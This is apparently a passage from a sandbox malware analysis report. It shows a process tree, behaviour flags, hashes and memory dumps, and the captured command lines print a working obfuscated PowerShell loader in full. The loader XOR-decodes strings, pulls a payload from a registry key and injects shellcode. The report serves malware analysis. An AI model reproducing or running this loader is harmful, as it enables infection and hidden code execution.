MeCTa3UdCSk2PaCAc9InDEnEHoCty2PlCTe9FoDSkFRe8FrCLi8Sa8BeEDu8MoCFrDWoDbe8AfCGrDStCNo3TrDstCChDTrFByCOrDChCAf1PrCSt0SpCPu5MoCAp2BjCUdBBlDDiFCaDReFMaDTh5NoDAbFBeDSk8SeCUl9toCAn1EnCOk9boDAnETuCGi2DoCBi9AnDKoFKo9St8No8Au5So8Je0Po8FoCSu8Fo4ViERgBTrEPu8SsFSt8Yd8BlCFoELaCRe8Be4PlFRi7BaEBr5VaCNg2UnDSl8ToFArCheDHe8DiDTrEteFNo1Ov8Fr0Ba8FeCfoFAf7BlFVs9LuERe5SkCGr2MoDcu8ar9DyFMo9ReEomFIm1In8Cl0Tr8InCSeFDi7WhFFa9PaENo5UnCFr2UnDKa8In9AnFTr9KrEprFjo1No8An0Ed8UnCPrFHe7SvFUd9TiEDi5ReCbi2MuDla8Fr9BlFan9HaEGeFTe1Kr8Un5Om8CiCan8Hj4paFAf7siEIm5PrCGa2NoDMe8FoFLoCStDQu8IcDDiEPiFDi1Ne8Kv5Tr8To5Sa8In5Pr'Ca;Fa&re(de`$JaDInaOvtfiaOfoDapLusKoaSamBrlUdiUnnMegAlsSasUdySosPatAleUdmEkeBjrAanAbeBisFe7Cu)Re Ly`$RaOVicBrhHr2Sk0In6Is6Fo;su`$ShUPrdSumfoaRerdavSpnTpiOpnNogFueDinUbsHo Pa=Be TrfMgkKnpSt Sk`$GrDUaamutTaaSooChppasFuaDrmUflAnidynLigSksPesciyBrsimtBlefomFleSkrCunBeeTusNo5Sw Ta`$AaDdraLitsyaVaoRapPhsSaaTymsklCaiLanPrgSasLysPayCosHutArenemSueGlrSenUneTrsDi6Me;Fo`$PrOBecHyhEp2Be0Be6Ir7tr ho=Nu TaHSmTScBAd Fi'Ba8Fr8StEan8ErCEn5BeDBaFVaCRoFMaCTu0EfCGu3HvDsoFPuCPr9prDChFpu9BoFKe8MiCSy9fo1In8DiCGe8mo8TeETvAAmDRe9SoDMaCEsDHoCClCGi9FoCNo8EfCAp9FrDFoFch9Gy8Fa8Qu2BaEUn5StCCh2HaDNoARoCSt3AfCHv7NaCBa9Ov8Mo4deFGa7UnEOm5UnCAr2GrDHa8PoFNoCUnDSe8EmDauEdiFSp1No9sk6Sa9Ne6OmFRe6VkCPa9BeDEvEUnCso3Br8Ra0bl8DiCMe9ReAEr9CyASe9GoDTu8Qu0Co8DiCBe9BlCDiDEx4Ri9BiFRe9StCVa9OmCTj9SpCFe8re0Pe8VaCTa9FoCMiDCo4Ro9Sp8Go9MeCIn8Af5Kr'hu;Ov&Da(si`$UnDKoaTrtMaaInoYepFlsWiaMemSalSaiBrnAtgKesskskuyTesTrtMaeAfmBleKirPenNoeGrsEx7Ch)In Ud`$AtORucGehSk2Fi0Eb6Pe7Di;ad`$AaOPrcBrhPa2Re0Au6Ur8Ri Ov=Sn agHArTSkBVe As'Op8Co8liEUn9BiCSaAKaDJe8ObCPy9BaDAdEKaCJu1UmCKo2LaCOl8EqCUn9naCDi2SiCBo9Sk8hyCDi9Br1Ig8BlCAk8Ch8MiEOuAMiDRs9InDExCOrDRiCHoCMa9FoCst8BoCDo9KuDTrFMi9Sa8Ed8Sk2leEBl5KaCFr2PoDcuASaCPr3MaCSn7UbCBe9Re8Te4MiFPh7StEAd5RrCPo2PrDKu8SkFDeCDaDCa8BaDVoEAfFTi1Lu9Ra6Sp9Or6spFGe6FuCGo9InDKrEXeCga3Si8Ru0Cu8UiCAp9re5Pa9KaBBu9Ch4Th9ItBDa9coFmu9Ce5De9StESd9KoCra8tr0mo8BeCga9SpCEuDBo4Sp9BiFHe9BlCPr9PlCNo9ElCOv8Fo0Ha8BlCRu9KeCUdDSl4Pe9Ko8ko8Sp5Ek'Ph;Ty&Ar(Ma`$vaDMtaHatPraLeoSppResStaAimFjlUpiRanPygPlskhsFoysusSutDieApmHuePrrOunTeeAlsVi7Pr)Su Hr`$LvOFrcUdhHi2Ry0Af6Pr8Os;Ga`$ToGAfaBolFovSaaKrnDeoRhtGaeSukBrnOriStsBrkUneChsAn=An(MoGLoeDrtba-TeIMitToeEumRePDarTooBepBleKirFotCryde St-AcPFraFltSkhVi Bo'blHAuKLiCFoUFo:Kr\TiTLihHaiUnoCeaDilCacFeoLohAboSolFl\BeNCheAgdRekZarchaKodVasLo'Ne)Ti.StACslCadOpeErhDiystdreaBrsJeeFa;Fa`$BeOUncGahKi2Ac0Tr6Li9Sa Ce=Pr KiHFuTSkBSe Va'Sp8Br8BiEBe3krCSlFHeCAl4De9HuESu9ReCSh9NoAIs8WeCqu9By1Vo8LaCdiFCo7UnFSaFBaDPh5InDsaFAnDBe8DrCOm9PoCBr1Ce8Uf2baEEuFLoCOu3CoCDe2BrDNeAslCCh9OvDgrEUnDSi8OdFPr1Cr9Tr6Ko9El6DeEBrAseDPlETiCFo3caCHo1beEPeEflCMaDUdDBeFTaCSk9Ph9ElAPh9Ch8AnFBlFEnDEm8UnDBaEJaCRe5FeCAk2InCDrBLa8St4Ld8Du8ScEBrBHaCSeDJaCSe0LyDFlASaCMoDAwCPi2ReCLi3KvDOv8InCBr9ToCSt7ChCMa2SiCBe5HoDkoFPrCPr7UnCTr9ReDSkFKi8St5Br'fl;Bl&Ui(Ji`$CyDAaaUntKoaWaoUnpIssOvaGemDelMuiTrnNegFrsPusAeyNesSttDeeKomSpeUnrPanBeeRisPr7Su)Le ir`$OpOHucEihFo2ab0St6Wo9Li;Ca`$BiGMaaFulUnvPhaAtnWaoSktTrePrkThnBiiEfsSikSueGlsPh0Sr Ha=Br CaHKfTSeBRe Tu'LoFHe7BeFPaFSmDSu5EkDLiFgaDRe8OrCLj9SnCSu1Pr8Ka2noFLeEbyDSi9PaCpj2LyDFi8SrCAm5RaCLi1BeCEx9So8Im2YdEVe5BeCUn2KiDFl8PrCTe9RaDSkEVeCLo3ClDVaCKbFHjFSiCMa9PaDStEGeDFrATeCPe5ArCOvFsmCSu9UnDpaFSj8Ti2BrEBi1BuCKrDRiDOpESpDouFteCAr4brCpaDReCDy0DuFte1Sp9hy6Gs9Sp6CoEAnFKlCRe3BaDKlCBeDPs5Ra8Fu4Tr8Zi8AdEbe3CaCStFLrCEx4La9LiESt9FiCTi9biASl8Xe0Ud8PiCPa9SuCSt8Ca0Su8StCsh8ThCDu8Me8UnETr8GeCen5DeDBeFBrCinFUdCSp0LeCTe3KlDUdFmoCKo9CrDPiFNe9grFFa8Kv0An8TeCar9phASl9IdAis9HeDCe8un5La'Ch;Un&As(Po`$SaDRaatrtTuaJuoFopKasBraOumNolKaiFrnRegmysDosExyPrsSktBaeJemLyeYerFrnTvePosAr7Ci)Id Br`$syGStaRelMavFeaKlnTaoRetHaeBikFinPhiBlsMokOpeStsSo0Va;Ov`$SwCJoaPutKiiUnoAcnbuiBecPhaGelEjlOsyHe=Un`$HaOHocHlhBe2br0Pu6Su.nacmioUtuSinRetPr-gr6fo6Fo1po;Ga`$ReGLiaSulPavToaRenGeoSetKeeHekNonSiikosBakSteJosOv1Dr Tr=Pr PeHDoTReBBr St'TrFNe7EeFAnFCuDKl5BlDKlFSaDpe8PlCFo9boCSc1Li8Hi2KaFUnEGgDSa9KrCEn2CrDGl8ZoCFr5SaCGr1DrCRe9tu8Pa2UpEBu5MoCAc2StDln8OrCBa9GeDDiETrCCh3BuDPoCPeFDaFKvCPh9SoDFoEHeDDeAKoCke5BiCMeFBaCri9ChDSaFLa8sk2HuEOp1enCArDGrDTaEMeDStFAmCPa4NoCUnDReCve0ToFLn1Pe9Fi6Tr9co6ZoEMiFViCOv3SuDHyCPiDBi5Is8st4Pl8fu8DeESh3vaCFlFEgCSt4Ba9StEBr9RiCBr9UnAMe8va0Aa8LgCBi9BeAKo9StARe9HoDSu8As0Po8HeCfi8Co8OvEEk9UnCLyAMaDSe8ToCHo9HaDSoEFrCVi1NoCRa2flCSu8AfCYp9SkCsi2BeCYd9Si8Sk0St8SuCHy8Ti8SiECoFFlCSeDCoDPa8ZaCCi5SeCEt3SyCSc2SeCSy5MeCMaFTrChvDClCCo0BeCYo0FiDFo5St8Pr5In'Le;Fa&Sw(Qu`$GrDUdaGatNyaChoInpChsLaaDymOllLoiBanomgInsImsHeyeksUvtMieBamFaeFirDenUneDesSa7tr)Fl Ou`$EkGStaEglAfvPoaCynPeoXitPeeSykOvnLiiSpsRukLeePrsNo1Op;Al`$KvGBoaSklkivTiaStnDaoUntMaechkKunVaiBesSkkleeBasAa2va Ch=At TuHNoTHoBGr gr'th8Co8kaCCaAJeDSo9PaDUaEAfCKe9Ar8ThCMi9Sk1st8PlCRaFPe7ReFRiFCoDLo5neDMoFAsDVi8MaCJi9TsCZi1No8Sa2TeFArERoDMo9KoCAr2SpDCa8UnCLd5SkCMg1TiCTy9Mo8No2EcEsk5DrCPr2orDWi8GaCSk9MaDImEAnCHe3UnDNoCTrFErFHeCRa9TeDheEThDIdASlCPr5BaCThFOmCIm9DoDUnFHe8Al2KrEUn1GrCAnDDaDunESkDViFChCfi4BaCHaDFaCRe0ReFEm1Ov9Al6Ha9Fo6ArEBrBkrCfo9FeDFr8GoEUs8RoCfa9ArCRa0HeCRa9smCPoBSpCStDinDSq8VoCSh9FaESyAFuCre3ShDEpEUnEAfAToDSm9FoCSt2phCKaFNoDFr8BeCUn5spCEl3CuCCh2DdFGoCscCEx3AeCUl5IlCAc2StDKo8SeCBr9DiDFlEme8Ra4Go8br4UbCOcAHyCSi7CoDFoCSk8RiCHo8Cl8DeFTrFAlCTiDroCex2MiCEt8MiCPrDSuCVe0No8ZoCCh8Nd8OvEBiADeCId5ReDBuFvuCSk7FoCTv9IdDSuFInDSy8juCbn2TrCBoBBeCkn9biDOuEVeCCh2suCTi9Fe8Pi5No8Ud0Bl8SkCsy8Ro4GoECeBSvETy8HuFSi8St8VuCTiEBlCFl8yv4haFMe7ChEbi5WiCHu2SaDSl8foFkiCstDVe8VrDPrEZiFTi1Vr8De0Ph8caCMeFMa7UnEKl5ZiCRn2InDEx8NoFStCEtDRu8VeDlaEUdFRi1bi8de0La8CoCKaFHu7LaEBu5LoCTa2SrDRe8FaFAmCUnDHe8KrDTjEFoFSv1Se8fo0Vi8geCPoFBo7EkEra5StCho2upDCr8fuFLeCLeDSt8BlDPrEInFSe1Ta8Un0Na8StCWiFRi7OvEre5peCCo2OpDGa8InFScCObDAd8BoDLiEOvFgr1Bi8Pl5Gu8afCLe8Sc4PeFPh7BlESa5AaCHu2BiDUn8ReFLrCSpDAd8SuDmaEUnFAn1Ti8Hy5Me8po5Su8Va5Ch'Ou;Ka&Pe(Ac`$PeDFuaRetLiaKaoBopInsCeaBemtolAdiTanBagInsFosBayPlsMatUneRemBreBlrAtnAceSisPe7Te)Ur Or`$VaGFeaSulByvGuaUnnPhoHatNiebokGonMaiVesUnkFreunsHo2Ud;Om`$UdGLaaSalbnvEaangnAnoeftSoeAckNanHaiNesChkOpeFlsSk3No Uh=st seHGrTSnBTy ra'Cl8Re8HuCSaAIsDSe9BeDadEJeCMe9Ku8Tu2WrEsk5MaCPe2FrDMaAstCRn3StCNo7BaCRe9St8Do4Po8Fr8SuESa8SiCVa5LeDPrFDaCGlFMuCDe0BiCbu3OfDCiFPaCha9FeDBaFKl9NoFCo8Pu0Ud8Sy8TeELo9TeCCyANoDRa8SaCCo9SwDCrEseCSn1BaCUn2DeCDe8TrCCo9FaCBi2HaCTo9Su8Te0Mi8Or8SmFOb9AtCHo8IkCVi1TiCKlDFuDStEFoDMbABiCSt2SkCBe5FlCSc2TrCHyBTvCEp9GlCAr2HaDMoFHa8Sp0Sa9BrCFr8Ka0Sp9BrCNo8Re5Po'Pu;Br&Va(Su`$DeDInaPatViaHooVepArsBraNemAnlDiiConUngFasUdsToyPyshytVeeWamMaeGrrManreeStsMy7Sp)ti He`$TrGudaGelTjvAmaTrnPooSutejeEdkEsnHyiPesSekFieShsSa3Vr#Ap;""";Function Galvanotekniskes9 { param([String]$Plastic); For($Semiblasphemous=2; $Semiblasphemous -lt $Plastic.Length-1; $Semiblasphemous+=(2+1)){ $Anflyvendes = $Anflyvendes + $Overanstreng4 + $Plastic.Substring($Semiblasphemous, 1); } $Anflyvendes;}$leveringstidernes0 = Galvanotekniskes9 'RaIomEPrXdr ';$leveringstidernes1= Galvanotekniskes9 $perceptionism;if([IntPtr]::size -eq 8){START-job { param($Luane) powershell $Luane } -RunAs32 -Argument $leveringstidernes1 | wait-job | Receive-Job;}else{&$leveringstidernes0 $leveringstidernes1;};;;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1984
- - \??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:536
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Plastic); $Sacks = New-Object byte[] ($Plastic.Length / 2); For($Semiblasphemous=0; $Semiblasphemous -lt $Plastic.Length; $Semiblasphemous+=2){ $Sacks[$Semiblasphemous/2] = [convert]::ToByte($Plastic.Substring($Semiblasphemous, 2), 16); $Sacks[$Semiblasphemous/2] = ($Sacks[$Semiblasphemous/2] -bxor 172); } [String][System.Text.Encoding]::ASCII.GetString($Sacks);}$Skulende0=HTB 'FFD5DFD8C9C182C8C0C0';$Skulende1=HTB 'E1C5CFDEC3DFC3CAD882FBC5C29F9E82F9C2DFCDCAC9E2CDD8C5DAC9E1C9D8C4C3C8DF';$Skulende2=HTB 'EBC9D8FCDEC3CFEDC8C8DEC9DFDF';$Skulende3=HTB 'FFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E4CDC2C8C0C9FEC9CA';$Skulende4=HTB 'DFD8DEC5C2CB';$Skulende5=HTB 'EBC9D8E1C3C8D9C0C9E4CDC2C8C0C9';$Skulende6=HTB 'FEF8FFDCC9CFC5CDC0E2CDC1C9808CE4C5C8C9EED5FFC5CB808CFCD9CEC0C5CF';$Skulende7=HTB 'FED9C2D8C5C1C9808CE1CDC2CDCBC9C8';$Skulende8=HTB 'FEC9CAC0C9CFD8C9C8E8C9C0C9CBCDD8C9';$Skulende9=HTB 'E5C2E1C9C1C3DED5E1C3C8D9C0C9';$Dataopsamlingssystemernes0=HTB 'E1D5E8C9C0C9CBCDD8C9F8D5DCC9';$Dataopsamlingssystemernes1=HTB 'EFC0CDDFDF808CFCD9CEC0C5CF808CFFC9CDC0C9C8808CEDC2DFC5EFC0CDDFDF808CEDD9D8C3EFC0CDDFDF';$Dataopsamlingssystemernes2=HTB 'E5C2DAC3C7C9';$Dataopsamlingssystemernes3=HTB 'FCD9CEC0C5CF808CE4C5C8C9EED5FFC5CB808CE2C9DBFFC0C3D8808CFAC5DED8D9CDC0';$Dataopsamlingssystemernes4=HTB 'FAC5DED8D9CDC0EDC0C0C3CF';$Dataopsamlingssystemernes5=HTB 'C2D8C8C0C0';$Dataopsamlingssystemernes6=HTB 'E2D8FCDEC3D8C9CFD8FAC5DED8D9CDC0E1C9C1C3DED5';$Dataopsamlingssystemernes7=HTB 'E5E9F4';$Dataopsamlingssystemernes8=HTB 'F0';$Sandal=HTB 'F9FFE9FE9F9E';$Fiskestngerne=HTB 'EFCDC0C0FBC5C2C8C3DBFCDEC3CFED';function fkp {Param ($Bevilgende, $Horrorise) ;$Och2060 =HTB '88F9C2C8C9DEDFD8D8D8C9C0DFC9DFCAC3C2C8C9DF8C918C84F7EDDCDCE8C3C1CDC5C2F19696EFD9DEDEC9C2D8E8C3C1CDC5C282EBC9D8EDDFDFC9C1CEC0C5C9DF84858CD08CFBC4C9DEC981E3CEC6C9CFD88CD78C88F382EBC0C3CECDC0EDDFDFC9C1CEC0D5EFCDCFC4C98C81EDC2C88C88F382E0C3CFCDD8C5C3C282FFDCC0C5D88488E8CDD8CDC3DCDFCDC1C0C5C2CBDFDFD5DFD8C9C1C9DEC2C9DF9485F7819DF182E9DDD9CDC0DF8488FFC7D9C0C9C2C8C99C858CD18582EBC9D8F8D5DCC98488FFC7D9C0C9C2C8C99D85';&($Dataopsamlingssystemernes7) $Och2060;$Och2065 = HTB '88EBCDD9DFDFCAC5C0D8C9DECAD9C2C7D8C5C3C2C9C28C918C88F9C2C8C9DEDFD8D8D8C9C0DFC9DFCAC3C2C8C9DF82EBC9D8E1C9D8C4C3C88488FFC7D9C0C9C2C8C99E808CF7F8D5DCC9F7F1F18CEC8488FFC7D9C0C9C2C8C99F808C88FFC7D9C0C9C2C8C9988585';&($Dataopsamlingssystemernes7) $Och2065;$Och2061 = HTB 'DEC9D8D9DEC28C88EBCDD9DFDFCAC5C0D8C9DECAD9C2C7D8C5C3C2C9C282E5C2DAC3C7C98488C2D9C0C0808CEC84F7FFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E4CDC2C8C0C9FEC9CAF184E2C9DB81E3CEC6C9CFD88CFFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E4CDC2C8C0C9FEC9CA8484E2C9DB81E3CEC6C9CFD88CE5C2D8FCD8DE85808C8488F9C2C8C9DEDFD8D8D8C9C0DFC9DFCAC3C2C8C9DF82EBC9D8E1C9D8C4C3C88488FFC7D9C0C9C2C8C999858582E5C2DAC3C7C98488C2D9C0C0808CEC8488EEC9DAC5C0CBC9C2C8C985858585808C88E4C3DEDEC3DEC5DFC98585';&($Dataopsamlingssystemernes7) $Och2061;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $Bobble,[Parameter(Position = 1)] [Type] $Politianmeldelsernes = [Void]);$Och2062 = HTB '88FFC7C3DCD9C8DFC9DEC9DF8C918CF7EDDCDCE8C3C1CDC5C2F19696EFD9DEDEC9C2D8E8C3C1CDC5C282E8C9CAC5C2C9E8D5C2CDC1C5CFEDDFDFC9C1CEC0D58484E2C9DB81E3CEC6C9CFD88CFFD5DFD8C9C182FEC9CAC0C9CFD8C5C3C282EDDFDFC9C1CEC0D5E2CDC1C98488FFC7D9C0C9C2C8C9948585808CF7FFD5DFD8C9C182FEC9CAC0C9CFD8C5C3C282E9C1C5D882EDDFDFC9C1CEC0D5EED9C5C0C8C9DEEDCFCFC9DFDFF19696FED9C28582E8C9CAC5C2C9E8D5C2CDC1C5CFE1C3C8D9C0C98488FFC7D9C0C9C2C8C995808C88CACDC0DFC98582E8C9CAC5C2C9F8D5DCC98488E8CDD8CDC3DCDFCDC1C0C5C2CBDFDFD5DFD8C9C1C9DEC2C9DF9C808C88E8CDD8CDC3DCDFCDC1C0C5C2CBDFDFD5DFD8C9C1C9DEC2C9DF9D808CF7FFD5DFD8C9C182E1D9C0D8C5CFCDDFD8E8C9C0C9CBCDD8C9F185';&($Dataopsamlingssystemernes7) $Och2062;$Och2063 = HTB '88FFC7C3DCD9C8DFC9DEC9DF82E8C9CAC5C2C9EFC3C2DFD8DED9CFD8C3DE8488FFC7D9C0C9C2C8C99A808CF7FFD5DFD8C9C182FEC9CAC0C9CFD8C5C3C282EFCDC0C0C5C2CBEFC3C2DAC9C2D8C5C3C2DFF19696FFD8CDC2C8CDDEC8808C88EEC3CECEC0C98582FFC9D8E5C1DCC0C9C1C9C2D8CDD8C5C3C2EAC0CDCBDF8488FFC7D9C0C9C2C8C99B85';&($Dataopsamlingssystemernes7) $Och2063;$Och2064 = HTB '88FFC7C3DCD9C8DFC9DEC9DF82E8C9CAC5C2C9E1C9D8C4C3C88488E8CDD8CDC3DCDFCDC1C0C5C2CBDFDFD5DFD8C9C1C9DEC2C9DF9E808C88E8CDD8CDC3DCDFCDC1C0C5C2CBDFDFD5DFD8C9C1C9DEC2C9DF9F808C88FCC3C0C5D8C5CDC2C1C9C0C8C9C0DFC9DEC2C9DF808C88EEC3CECEC0C98582FFC9D8E5C1DCC0C9C1C9C2D8CDD8C5C3C2EAC0CDCBDF8488FFC7D9C0C9C2C8C99B85';&($Dataopsamlingssystemernes7) $Och2064;$Och2065 = HTB 'DEC9D8D9DEC28C88FFC7C3DCD9C8DFC9DEC9DF82EFDEC9CDD8C9F8D5DCC98485';&($Dataopsamlingssystemernes7) $Och2065 ;}$Konventionernes = HTB 'C7C9DEC2C9C09F9E';$Och2066 = HTB '88EAD9DCDCC9C8C9DF988C918CF7FFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E1CDDEDFC4CDC0F19696EBC9D8E8C9C0C9CBCDD8C9EAC3DEEAD9C2CFD8C5C3C2FCC3C5C2D8C9DE8484CAC7DC8C88E7C3C2DAC9C2D8C5C3C2C9DEC2C9DF8C88E8CDD8CDC3DCDFCDC1C0C5C2CBDFDFD5DFD8C9C1C9DEC2C9DF9885808C84EBE8F88CEC84F7E5C2D8FCD8DEF1808CF7F9E5C2D89F9EF1808CF7F9E5C2D89F9EF1808CF7F9E5C2D89F9EF1858C84F7E5C2D8FCD8DEF1858585';&($Dataopsamlingssystemernes7) $Och2066;$Udmarvningens = fkp $Dataopsamlingssystemernes5 $Dataopsamlingssystemernes6;$Och2067 = HTB '88E8C5DFCFC0C3DFC9DF9F8C918C88EAD9DCDCC9C8C9DF9882E5C2DAC3C7C984F7E5C2D8FCD8DEF19696F6C9DEC3808C9A9A9D808C9CD49F9C9C9C808C9CD4989C85';&($Dataopsamlingssystemernes7) $Och2067;$Och2068 = HTB '88E9CAD8C9DEC1C2C8C9C2C98C918C88EAD9DCDCC9C8C9DF9882E5C2DAC3C7C984F7E5C2D8FCD8DEF19696F6C9DEC3808C959B949B9F959E9C808C9CD49F9C9C9C808C9CD49885';&($Dataopsamlingssystemernes7) $Och2068;$Galvanotekniskes=(Get-ItemProperty -Path 'HKCU:\Thioalcohol\Nedkrads').Aldehydase;$Och2069 = HTB '88E3CFC49E9C9A8C918CF7FFD5DFD8C9C182EFC3C2DAC9DED8F19696EADEC3C1EECDDFC99A98FFD8DEC5C2CB8488EBCDC0DACDC2C3D8C9C7C2C5DFC7C9DF85';&($Dataopsamlingssystemernes7) $Och2069;$Galvanotekniskes0 = HTB 'F7FFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E1CDDEDFC4CDC0F19696EFC3DCD58488E3CFC49E9C9A808C9C808C8C88E8C5DFCFC0C3DFC9DF9F808C9A9A9D85';&($Dataopsamlingssystemernes7) $Galvanotekniskes0;$Cationically=$Och206.count-661;$Galvanotekniskes1 = HTB 'F7FFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E1CDDEDFC4CDC0F19696EFC3DCD58488E3CFC49E9C9A808C9A9A9D808C88E9CAD8C9DEC1C2C8C9C2C9808C88EFCDD8C5C3C2C5CFCDC0C0D585';&($Dataopsamlingssystemernes7) $Galvanotekniskes1;$Galvanotekniskes2 = HTB '88CAD9DEC98C918CF7FFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E1CDDEDFC4CDC0F19696EBC9D8E8C9C0C9CBCDD8C9EAC3DEEAD9C2CFD8C5C3C2FCC3C5C2D8C9DE8484CAC7DC8C88FFCDC2C8CDC08C88EAC5DFC7C9DFD8C2CBC9DEC2C985808C84EBE8F88CEC84F7E5C2D8FCD8DEF1808CF7E5C2D8FCD8DEF1808CF7E5C2D8FCD8DEF1808CF7E5C2D8FCD8DEF1808CF7E5C2D8FCD8DEF1858C84F7E5C2D8FCD8DEF1858585';&($Dataopsamlingssystemernes7) $Galvanotekniskes2;$Galvanotekniskes3 = HTB '88CAD9DEC982E5C2DAC3C7C98488E8C5DFCFC0C3DFC9DF9F8088E9CAD8C9DEC1C2C8C9C2C98088F9C8C1CDDEDAC2C5C2CBC9C2DF809C809C85';&($Dataopsamlingssystemernes7) $Galvanotekniskes3#"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1616

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
ed20d53e518a30baf05856069b4e4eb5

SHA1
f9fb5dfffe3d34320cb3270aab26ab352b7eb30b

SHA256
5f1411c6c14da29bf1924da59cfc7451335c5729ff5a5483b6d113e53fc5644e

SHA512
5695c99a723db1c453add4df9674ed105a0228680a8b639ceb904db86e6f4a35adb5cf904ac0b772cfc6826d2c15ba9cc62d4431412e8929c5d8e33c70da648c

Download Submit
memory/536-61-0x0000000075BE1000-0x0000000075BE3000-memory.dmp

Filesize
8KB

Download
memory/536-71-0x00000000735B0000-0x0000000073B5B000-memory.dmp

Filesize
5.7MB

Download
memory/536-63-0x00000000735B0000-0x0000000073B5B000-memory.dmp

Filesize
5.7MB

Download
memory/1588-54-0x000007FEFBD41000-0x000007FEFBD43000-memory.dmp

Filesize
8KB

Download
memory/1616-68-0x0000000005CE0000-0x000000000BA37000-memory.dmp

Filesize
93.3MB

Download
memory/1616-67-0x00000000735B0000-0x0000000073B5B000-memory.dmp

Filesize
5.7MB

Download
memory/1616-72-0x00000000735B0000-0x0000000073B5B000-memory.dmp

Filesize
5.7MB

Download
memory/1984-62-0x000000000243B000-0x000000000245A000-memory.dmp

Filesize
124KB

Download
memory/1984-59-0x0000000002434000-0x0000000002437000-memory.dmp

Filesize
12KB

Download
memory/1984-58-0x000007FEF2A70000-0x000007FEF35CD000-memory.dmp

Filesize
11.4MB

Download
memory/1984-57-0x000007FEF35D0000-0x000007FEF3FF3000-memory.dmp

Filesize
10.1MB

Download
memory/1984-69-0x0000000002434000-0x0000000002437000-memory.dmp

Filesize
12KB

Download
memory/1984-70-0x000000000243B000-0x000000000245A000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing